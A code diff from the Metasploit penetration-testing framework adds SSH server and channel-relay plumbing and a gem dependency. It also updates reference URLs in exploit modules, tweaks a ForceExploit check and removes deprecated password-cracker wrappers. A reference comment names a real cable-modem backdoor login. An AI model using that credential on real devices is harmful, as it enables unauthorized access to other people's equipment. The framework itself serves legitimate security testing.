+  end
+
+  #
+  # Provide IO from which to read remote-end inputs
+  #
+  # @param fd [Integer] Desired descriptor from which to read
+  # @param cn [Integer] Desired channel from which to take fd
+  #
+  # @return [IO] File descriptor for reading
+  def reader(fd = 0, cn = open_channel_keys.first)
+    channels[cn].io[fd]
+  end
+
+  #
+  # Provide IO into which writes to the remote end can be sent
+  #
+  # @param fd [Integer] Desired descriptor to which to write
+  # @param cn [Integer] Desired channel from which to take fd
+  #
+  # @return [IO] File descriptor for writing
+  def writer(fd = 1, cn = open_channel_keys.first)
+    channels[cn].io[fd]
+  end
+
+  #
+  # Close the connection and underlying socket
+  #
+  def close
+    super
+    @transport.io.close if @transport and !@transport.io.closed?
+  end
+
+  attr_accessor :transport, :authentication, :channels, :global_request_handler
+  attr_reader :server, :context
+end
+
+##
+# Create a monitored relay between channel IOs and external FD-like objects
+##
+class ChannelRelay
+  include Rex::IO::SocketAbstraction
+
+  def initialize(src, dst, threadname = "SshChannelMonitorRemote")
+    initialize_abstraction(src, dst)
+  end
+
+  def initialize_abstraction(src, dst, threadname)
+    self.rsock = src
+    self.lsock = dst
+    monitor_rsock(threadname)
+  end
+end
+
+##
+# A modified Rex::IO::Stream for separate file descriptors
+# consumers are responsible for relevant initialization and
+# fd_rd+fd_wr methods to expose selectable R/W IOs.
+##
+module IOMergeAbstraction
+  def inspect
+    "#{self.class}(#{fd_rd.inspect}|#{fd_wr.inspect})"
+  end
+
+  def write(buf, opts = {})
+    total_sent   = 0
+    total_length = buf.length
+    block_size   = 32768
+
+    begin
+      while( total_sent < total_length )
+        s = Rex::ThreadSafe.select( nil, [ fd_wr ], nil, 0.2 )
+        if( s == nil || s[0] == nil )
+          next
+        end
+        data = buf[total_sent, block_size]
+        sent = fd_wr.write_nonblock( data )
+        if sent > 0
+          total_sent += sent
+        end
+      end
+    rescue ::Errno::EAGAIN, ::Errno::EWOULDBLOCK
+      # Sleep for a half a second, or until we can write again
+      Rex::ThreadSafe.select( nil, [ fd_wr ], nil, 0.5 )
+      # Decrement the block size to handle full sendQs better
+      block_size = 1024
+      # Try to write the data again
+      retry
+    rescue ::IOError, ::Errno::EPIPE
+      return nil
+    end
+
+    total_sent
+  end
+
+  #
+  # This method reads data of the supplied length from the stream.
+  #
+  def read(length = nil, opts = {})
+
+    begin
+      return fd_rd.read_nonblock( length )
+    rescue ::Errno::EAGAIN, ::Errno::EWOULDBLOCK
+      # Sleep for a half a second, or until we can read again
+      Rex::ThreadSafe.select( [ fd_rd ], nil, nil, 0.5 )
+      # Decrement the block size to handle full sendQs better
+      retry
+    rescue ::IOError, ::Errno::EPIPE
+      return nil
+    end
+  end
+
+  #
+  # Polls the stream to see if there is any read data available.  Returns
+  # true if data is available for reading, otherwise false is returned.
+  #
+  def has_read_data?(timeout = nil)
+
+    # Allow a timeout of "0" that waits almost indefinitely for input, this
+    # mimics the behavior of Rex::ThreadSafe.select() and fixes some corner
+    # cases of unintentional no-wait timeouts.
+    timeout = 3600 if (timeout and timeout == 0)
+
+    begin
+      if ((rv = ::IO.select([ fd_rd ], nil, nil, timeout)) and
+          (rv[0]) and
+          (rv[0][0] == fd_rd))
+        true
+      else
+        false
+      end
+    rescue ::Errno::EBADF, ::Errno::ENOTSOCK
+      raise ::EOFError
+    rescue StreamClosedError, ::IOError, ::EOFError, ::Errno::EPIPE
+      #  Return false if the socket is dead
+      return false
+    end
+  end
+
+  def close
+    fd_rd.close if (fd_rd and !fd_rd.closed?)
+    fd_wr.close if (fd_wr and !fd_wr.closed?)
+  end
+
+  def closed?
+    (fd_rd.nil? or fd_rd.closed?) and (fd_wr.nil? or fd_wr.closed?)
+  end
+end
+
+##
+# Emulate a single bidirectional IO using the clients Connections Channels IOs
+##
+class ChannelFD
+  include Rex::IO::Stream
+  include IOMergeAbstraction
+  def initialize(parent, chan_id = nil)
+    @parent = parent
+  end
+
+  def inspect
+    "#{super}/#{@parent.inspect}"
+  end
+
+  def close
+    super
+    @parent.close unless @parent.closed?
+  end
+
+  def closed?
+    super and @parent.closed?
+  end
+
+  def cid
+    if @cid.nil?
+      @cid = @parent.connection.open_channel_keys.first
+    end
+    @cid
+  end
+
+  def cid=(chan_id)
+    if @parent.connection.open_channel_keys.include?(chan_id)
+      @cid = chan_id
+    else
+      raise "Invalid Channel ID passed to #{self.inspect}"
+    end
+  end
+  attr_reader :parent
+
+# private
+
+  #
+  # Provide a selectable filedescriptor open for reading
+  #
+  # @return [IO] Descriptor for reading
+  def fd_rd
+    begin
+      channel.io[0]
+    rescue
+    end
+  end
+
+  #
+  # Provide a selectable filedescriptor open for writing
+  #
+  # @param fd [Symbol] Output FD type, anything but :stderr uses 1 (STDOUT)
+  #
+  # @return [IO] Descriptor for writing
+  def fd_wr(fd = :stdout)
+    begin
+      channel.io[(fd == :stderr ? 2 : 1)]
+    rescue
+    end
+  end
+
+  #
+  # Expose a Channel from the Connection
+  #
+  # @return [HrrRbSsh::Connection::Channel] Channel object
+  def channel
+    @parent.connection.channels[cid]
+  end
+end
+
+end
+end
+end

lib/rex/proto/ssh/hrr_rb_ssh.rb

@@ -0,0 +1,72 @@
+# -*- coding: binary -*-
+require 'rex/socket'
+require 'hrr_rb_ssh'
+
+###
+#
+# Rex::Socket overrides for ::HrrRbSsh' use of stdlib sockets
+#
+###
+module HrrRbSsh
+class Connection
+
+class GlobalRequestHandler
+  def tcpip_forward(message)
+    if @connection.permit?(message[:'address to bind'], message[:'port number to bind'], true)
+      @logger.info { "starting tcpip-forward" }
+      begin
+        address_to_bind     = message[:'address to bind']
+        port_number_to_bind = message[:'port number to bind']
+        id = "#{address_to_bind}:#{port_number_to_bind}"
+        server = Rex::Socket::TcpServer.create(
+          'LocalHost' => address_to_bind,
+          'LocalPort' => port_number_to_bind,
+          'Context'   => @connection.options['Context'],
+          'Proxies'   => @connection.options['Proxies']
+        )
+        @tcpip_forward_servers[id] = server
+        @tcpip_forward_threads[id] = Thread.new(server){ |server|
+          begin
+            loop do
+              Thread.new(server.accept){ |s|
+                @connection.channel_open_start address_to_bind, port_number_to_bind, s
+              }
+            end
+          rescue => e
+            @logger.error { [e.backtrace[0], ": ", e.message, " (", e.class.to_s, ")\n\t", e.backtrace[1..-1].join("\n\t")].join }
+          end
+        }
+        @logger.info { "tcpip-forward started" }
+      rescue => e
+        @logger.warn { "starting tcpip-forward failed: #{e.message}" }
+        raise e
+      end
+    else
+      # raise Errno::EACCES
+    end
+  end
+end
+
+class Channel
+  class ChannelType
+    class DirectTcpip
+      def start
+        if @connection.permit?(@host_to_connect, @port_to_connect)
+          @socket = Rex::Socket::Tcp.create(
+            'PeerHost' => @host_to_connect,
+            'PeerPort' => @port_to_connect,
+            'Context'  => @connection.options['Context'],
+            'Proxies'  => @connection.options['Proxies']
+          )
+          @sender_thread = sender_thread
+          @receiver_thread = receiver_thread
+        else
+          # raise Errno::EACCES
+        end
+      end
+    end
+  end
+end
+
+end
+end

lib/rex/proto/ssh/server.rb

@@ -0,0 +1,201 @@
+# -*- coding: binary -*-
+require 'rex/proto/ssh/connection'
+
+module Rex
+module Proto
+module Ssh
+###
+#
+# Runtime extension of the SSH clients that connect to the server.
+#
+###
+
+module ServerClient
+  #
+  # Initialize a new connection instance.
+  #
+  def init_cli(server, do_not_start = false)
+    @server          = server
+    @connection      = Rex::Proto::Ssh::Connection.new(
+      self, server.server_options.merge(ssh_server: server), server.context
+    )
+    @connection_thread = Rex::ThreadFactory.spawn("SshConnectionMonitor-#{self}", false) {
+      self.connection.start
+    } unless do_not_start
+  end
+
+  def close
+    @connection_thread.kill if @connection_thread and @connection_thread.alive?
+    super
+  end
+
+  attr_reader :connection, :server
+end
+
+###
+#
+# Acts as an SSH server, accepting clients and extending them with Connections
+#
+###
+class Server
+
+  include Proto
+  #
+  # Initializes an SSH server as listening on the provided port and
+  # hostname.
+  #
+  def initialize(port = 22, listen_host = '0.0.0.0', context = {}, comm = nil,
+    ssh_opts = Ssh::Connection.default_options, cc_cb = nil, cd_cb = nil)
+
+    self.listen_host            = listen_host
+    self.listen_port            = port
+    self.context                = context
+    self.comm                   = comm
+    self.listener               = nil
+    self.server_options         = ssh_opts
+    self.on_client_connect_proc = cc_cb
+    self.on_client_data_proc    = cd_cb
+  end
+
+  # More readable inspect that only shows the url and resources
+  # @return [String]
+  def inspect
+    "#<#{self.class} ssh://#{listen_host}:#{listen_port}>"
+  end
+
+  #
+  # Returns the hardcore alias for the SSH service
+  #
+  def self.hardcore_alias(*args)
+    "#{(args[0])}#{(args[1])}"
+  end
+
+  #
+  # SSH server.
+  #
+  def alias
+    super || "SSH Server"
+  end
+
+
+  #
+  # Listens on the defined port and host and starts monitoring for clients.
+  #
+  def start(srvsock = nil)
+
+    self.listener = srvsock.is_a?(Rex::Socket::TcpServer) ? srvsock : Rex::Socket::TcpServer.create(
+      'LocalHost' => self.listen_host,
+      'LocalPort' => self.listen_port,
+      'Context'   => self.context,
+      'Comm'      => self.comm
+    )
+
+    # Register callbacks
+    self.listener.on_client_connect_proc = Proc.new { |cli|
+      on_client_connect(cli)
+    }
+    # self.listener.on_client_data_proc = Proc.new { |cli|
+    #   on_client_data(cli)
+    # }
+    self.clients         = []
+    self.monitor_thread  = Rex::ThreadFactory.spawn("SshServerClientMonitor", false) {
+      monitor_clients
+    }
+    self.listener.start
+  end
+
+  #
+  # Terminates the monitor thread and turns off the listener.
+  #
+  def stop
+    self.listener.stop
+    self.listener.close
+    self.clients = []
+  end
+
+
+  #
+  # Waits for the SSH service to terminate
+  #
+  def wait
+    self.listener.wait if self.listener
+  end
+
+  #
+  # Closes the supplied client, if valid.
+  #
+  def close_client(cli)
+    clients.delete(cli)
+    listener.close_client(cli.parent)
+  end
+
+
+  attr_accessor :listen_port, :listen_host, :context, :comm, :clients, :monitor_thread
+  attr_accessor :listener, :server_options, :on_client_connect_proc, :on_client_data_proc
+
+protected
+
+  #
+  # Extends new clients with the ServerClient module and initializes them.
+  #
+  def on_client_connect(cli)
+    cli.extend(ServerClient)
+
+    cli.init_cli(self)
+    if self.on_client_connect_proc
+      self.on_client_connect_proc.call(cli)
+    else
+      enqueue_client(cli)
+    end
+  end
+
+  #
+  # Watches FD channel abstractions, removes closed instances,
+  # checks for read data on clients if client data callback is defined,
+  # invokes the callback if possible, sleeps otherwise.
+  #
+  def monitor_clients
+    loop do
+      self.clients.delete_if {|c| c.closed? }
+      if self.on_client_data_proc
+        if clients.any? { |cli|
+          cli.has_read_data? and self.on_client_data_proc.call(cli)}
+          next
+        else
+          sleep 0.05
+        end
+      else
+        sleep 0.5
+      end
+    end
+  rescue => e
+    wlog(e)
+  end
+
+  #
+  # Waits for SSH client to "grow a pair" of FDs and adds
+  # a ChannelFD object derived from the client's Connection
+  # Channel's FDs to the Ssh::Server's clients array
+  #
+  # @param cli [Rex::Proto::Ssh::ServerClient] SSH client
+  #
+  def enqueue_client(cli)
+    Rex::ThreadFactory.spawn("ChannelFDWaiter", false) do
+      begin
+        Timeout::timeout(15) do
+          while cli.connection.open_channel_keys.empty? do
+            sleep 0.02
+          end
+          self.clients.push(Ssh::ChannelFD.new(cli))
+        end
+      rescue Timeout::Error
+        elog("Unable to find channel FDs for client #{cli}")
+      end
+    end
+  end
+
+end
+
+end
+end
+end

metasploit-framework.gemspec

@@ -198,6 +198,8 @@ Gem::Specification.new do |spec|
   spec.add_runtime_dependency 'faker'
   # Pinned as a dependency of i18n to the last working version
   spec.add_runtime_dependency 'concurrent-ruby','1.0.5'
+  # SSH server library
+  spec.add_runtime_dependency 'hrr_rb_ssh', '0.3.0.pre2'
 
   # AWS enumeration modules
   spec.add_runtime_dependency 'aws-sdk-s3'

modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb

@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary
       'Actions'        => [[ 'WebServer' ]],
       'PassiveActions' => [ 'WebServer' ],
       'References' => [
-        [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041'],
+        [ 'URL', 'https://blog.rapid7.com/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041'],
         [ 'URL', 'http://1337day.com/exploit/description/22581' ],
         [ 'OSVDB', '110664' ],
         [ 'CVE', '2014-6041' ]

modules/auxiliary/admin/atg/atg_client.rb

@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Auxiliary
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/01/22/the-internet-of-gas-station-tank-gauges'],
+          ['URL', 'https://blog.rapid7.com/2015/01/22/the-internet-of-gas-station-tank-gauges'],
           ['URL', 'http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-gaspot-experiment'],
           ['URL', 'https://github.com/sjhilt/GasPot'],
           ['URL', 'https://github.com/mushorg/conpot'],

modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb

@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary
         [ 'CVE', '2015-0964' ], # XSS vulnerability
         [ 'CVE', '2015-0965' ], # CSRF vulnerability
         [ 'CVE', '2015-0966' ], # "techician/yZgO8Bvj" web interface backdoor
-        [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems' ],
+        [ 'URL', 'https://blog.rapid7.com/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems' ],
       ]
     ))
 

modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb

@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
         [
           [ 'CVE', '2013-0136' ],
           [ 'US-CERT-VU', '701572' ],
-          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities' ]
+          [ 'URL', 'https://blog.rapid7.com/2013/05/15/new-1day-exploits-mutiny-vulnerabilities' ]
         ],
       'Actions'     =>
         [

modules/auxiliary/admin/http/nexpose_xxe_file_read.rb

@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
       'License' => MSF_LICENSE,
       'References'  =>
         [
-          [ 'URL', 'https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24' ]
+          [ 'URL', 'https://blog.rapid7.com/2013/08/16/r7-vuln-2013-07-24' ]
         ],
       'DefaultOptions' => {
         'SSL' => true

modules/auxiliary/admin/http/openbravo_xxe.rb

@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Auxiliary
           ['CVE', '2013-3617'],
           ['OSVDB', '99141'],
           ['BID', '63431'],
-          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']
+          ['URL', 'https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats']
         ],
       'License' => MSF_LICENSE,
       'DisclosureDate' => 'Oct 30 2013'

modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb

@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx'],
           ['URL', 'https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/'],
           ['URL', 'https://github.com/bidord/pykek'],
-          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit']
+          ['URL', 'https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit']
         ],
       'License' => MSF_LICENSE,
       'DisclosureDate' => 'Nov 18 2014'

modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb

@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary
       'References'     =>
         [
           [ 'CVE', '2014-5208' ],
-          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access']
+          [ 'URL', 'https://blog.rapid7.com/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access']
         ],
       'Actions'     =>
         [

modules/auxiliary/admin/wemo/crockpot.rb

@@ -74,9 +74,11 @@ class MetasploitModule < Msf::Auxiliary
 
     checkcode = check
 
-    unless checkcode == Exploit::CheckCode::Appears || datastore['ForceExploit']
-      print_error("#{checkcode[1]}. Set ForceExploit to override.")
-      return
+    unless datastore['ForceExploit']
+      unless checkcode == Exploit::CheckCode::Appears
+        print_error("#{checkcode[1]}. Set ForceExploit to override.")
+        return
+      end
     end
 
     case action.name

modules/auxiliary/analyze/crack_databases.rb

@@ -8,10 +8,10 @@ require 'msf/core/auxiliary/password_cracker'
 class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::PasswordCracker
   include Msf::Exploit::Deprecated
-  moved_from 'auxiliary/analyze/jtr_mssql'
-  moved_from 'auxiliary/analyze/jtr_mysql'
-  moved_from 'auxiliary/analyze/jtr_oracle'
-  moved_from 'auxiliary/analyze/jtr_postgres'
+  moved_from 'auxiliary/analyze/jtr_mssql_fast'
+  moved_from 'auxiliary/analyze/jtr_mysql_fast'
+  moved_from 'auxiliary/analyze/jtr_oracle_fast'
+  moved_from 'auxiliary/analyze/jtr_postgres_fast'
 
   def initialize
     super(

modules/auxiliary/analyze/crack_windows.rb

@@ -8,8 +8,7 @@ require 'msf/core/auxiliary/password_cracker'
 class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::PasswordCracker
   include Msf::Exploit::Deprecated
-  moved_from 'auxiliary/analyze/jtr_crack_fast'
-  moved_from 'auxiliary/analyze/jtr_windows'
+  moved_from 'auxiliary/analyze/jtr_windows_fast'
 
   def initialize
     super(

modules/auxiliary/analyze/jtr_aix.rb

@@ -1,32 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Auxiliary
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2019, 12, 31))
-
-  def initialize
-    super(
-      'Name'            => 'John the Ripper AIX Password Cracker',
-      'Description'     => %Q{
-          This module uses John the Ripper to identify weak passwords that have been
-        acquired from passwd files on AIX systems.
-      },
-      'Author'          =>
-        [
-          'theLightCosine',
-          'hdm'
-        ] ,
-      'License'         => MSF_LICENSE  # JtR itself is GPLv2, but this wrapper is MSF (BSD)
-    )
-
-  end
-
-  def run
-    fail_with(Failure::BadConfig, 'This module has been enhanced and move to: auxiliary/analyze/crack_aix')
-  end
-
-end

modules/auxiliary/analyze/jtr_linux.rb

@@ -1,39 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Auxiliary
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2019, 12, 31))
-
-  def initialize
-    super(
-      'Name'            => 'John the Ripper Linux Password Cracker',
-      'Description'     => %Q{
-          This module uses John the Ripper to identify weak passwords that have been
-        acquired from unshadowed passwd files from Unix systems. The module will only crack
-        MD5, BSDi and DES implementations by default. Set Crypt to true to also try to crack
-        Blowfish and SHA(256/512). Warning: This is much slower.
-      },
-      'Author'          =>
-        [
-          'theLightCosine',
-          'hdm'
-        ] ,
-      'License'         => MSF_LICENSE  # JtR itself is GPLv2, but this wrapper is MSF (BSD)
-    )
-
-    register_options(
-      [
-        OptBool.new('Crypt',[false, 'Try crypt() format hashes(Very Slow)', false])
-      ]
-    )
-
-  end
-
-  def run
-    fail_with(Failure::BadConfig, 'This module has been enhanced and move to: auxiliary/analyze/crack_linux')
-  end
-end

modules/auxiliary/analyze/jtr_mssql_fast.rb

@@ -1,31 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Auxiliary
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2019, 12, 31))
-
-  def initialize
-    super(
-      'Name'           => 'John the Ripper MS SQL Password Cracker (Fast Mode)',
-      'Description'    => %Q{
-          This module uses John the Ripper to identify weak passwords that have been
-        acquired from the mssql_hashdump module. Passwords that have been successfully
-        cracked are then saved as proper credentials.
-      },
-      'Author'         =>
-        [
-          'theLightCosine',
-          'hdm'
-        ],
-      'License'        => MSF_LICENSE  # JtR itself is GPLv2, but this wrapper is MSF (BSD)
-    )
-  end
-
-  def run
-    fail_with(Failure::BadConfig, 'This module has been enhanced and move to: auxiliary/analyze/crack_databases')
-  end
-end

modules/auxiliary/analyze/jtr_mysql_fast.rb

@@ -1,31 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Auxiliary
-  include Msf::Module::Deprecated
-
-  deprecated(Date.new(2019, 12, 31))
-
-  def initialize
-    super(
-      'Name'          => 'John the Ripper MySQL Password Cracker (Fast Mode)',
-      'Description'   => %Q{
-          This module uses John the Ripper to identify weak passwords that have been
-        acquired from the mysql_hashdump module. Passwords that have been successfully
-        cracked are then saved as proper credentials.
-      },
-      'Author'         =>
-        [
-          'theLightCosine',
-          'hdm'
-        ] ,
-      'License'        => MSF_LICENSE  # JtR itself is GPLv2, but this wrapper is MSF (BSD)
-    )
-  end
-
-  def run
-    fail_with(Failure::BadConfig, 'This module has been enhanced and move to: auxiliary/analyze/crack_databases')
-  end
-end